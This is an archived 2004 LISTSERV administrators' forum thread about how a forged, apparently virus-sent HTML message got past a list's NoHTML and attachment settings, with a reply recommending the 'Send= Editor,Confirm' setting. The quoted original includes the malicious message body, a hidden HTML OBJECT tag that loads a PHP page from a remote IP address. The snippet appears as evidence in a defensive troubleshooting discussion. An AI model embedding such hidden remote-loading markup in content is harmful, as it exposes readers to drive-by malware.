LISTSERV - LSTSRV-L Archives - COMMUNITY.EMAILOGY.COM

LSTSRV-L Archives

LISTSERV Site Administrators' Forum

LSTSRV-L

	LISTSERV Archives
	LSTSRV-L Home

	Log In
	Register

	Subscribe or Unsubscribe

	Search Archives

Options:	Use Monospaced Font Show Text Part by Default Show All Mail Headers
Topic:	[<< First] [< Prev] [Next >] [Last >>]

Re: NoHTML glitch

Claude Etienne <[log in to unmask]>

Tue, 23 Mar 2004 15:50:43 -0500

text/plain (82 lines)

If you do not use confirm with your send= editor then anyone who knows the
address of any of the list editor and knows how to forge mail, can post to
your list.  Add confirm to your SEND keyword (e.g. Send= editor, confirm)
and this will force your editor to confirm his or her own postings.


/*
Please note that L-Soft recommends setting "Send= Editor,Confirm" so as to
add a level of security against malicious users forging mail from an
"Editor=" address to get around your moderation settings, or against
badly-configured "vacation" programs that simply reflect the message back to
the list in a manner that makes it appear that the mail is coming from the
editor's address. The "Confirm" option causes LISTSERV to request an "OK"
confirmation from an editor when it receives mail claiming to be from that
editor.
*/

Claude.


----- Original Message -----
From: "Dennis Boone" <[log in to unmask]>
To: <[log in to unmask]>
Sent: Tuesday, March 23, 2004 3:02 PM
Subject: NoHTML glitch


> Over the weekend, the following was posted to one of our lists.  It was
> presumably forged by a virus; the From address was a legit editor of
> the list.  I've filed off the e-mail addresses on general principle.
>
>         Date:         Sun, 21 Mar 2004 01:44:56 -0800
>         Reply-To:     ...
>         Sender:       ...
>         From:         ...
>         Subject:      Incoming message
>         MIME-Version: 1.0
>         Content-Type: text/html; charset=us-ascii
>         Content-Transfer-Encoding: 7bit
>
>         <html><body>
>         <font face="System">
>         <OBJECT STYLE="display:none"
DATA="http://66.169.99.119:81/563373.php">
>         </OBJECT></body></html>
>
> The list in question in set "Attachments= No" and "Language= NoHTML".
> The header appears below.
>
> Anyone have a suggestion about how it got posted?  I'd like to close
> the leak.
>
> Dennis Boone
> H-Net
>
>         *  List-ID= H-ANNOUNCE
>         *  Ack= Yes
>         *  Attachments= No
>         *  Auto-Delete= yes,semi-auto,delay(5),max(100),Probe(15)
>         *  Change-Log= Yes
>         *  Confidential= No
>         *  Daily-Threshold= 50
>         *  Default-Options= FullHdr,Repro,MIME
>         *  Delivery-Pool= P,C
>         *  Digest=yes,same,daily,00:00,size(2000)
>         *  Editor-Header= Yes
>         *  Errors-To= ...
>         *  Files= No
>         *  Language= NoHTML
>         *  Newsgroups= None
>         *  Notebook= Yes,/lists/h-announce,Weekly,(H-ANNOUNCE)
>         *  Notify= Yes
>         *  Renewal= None
>         *  Reply-to= List,Respect
>         *  Review= Owner
>         *  Send= Editor
>         *  Stats= Normal,Private
>         *  Subscription= open,confirm
>         *  Validate= No
>         *  Editor= ...
>         *  Owner= ...

ATOM RSS1 RSS2

COMMUNITY.EMAILOGY.COM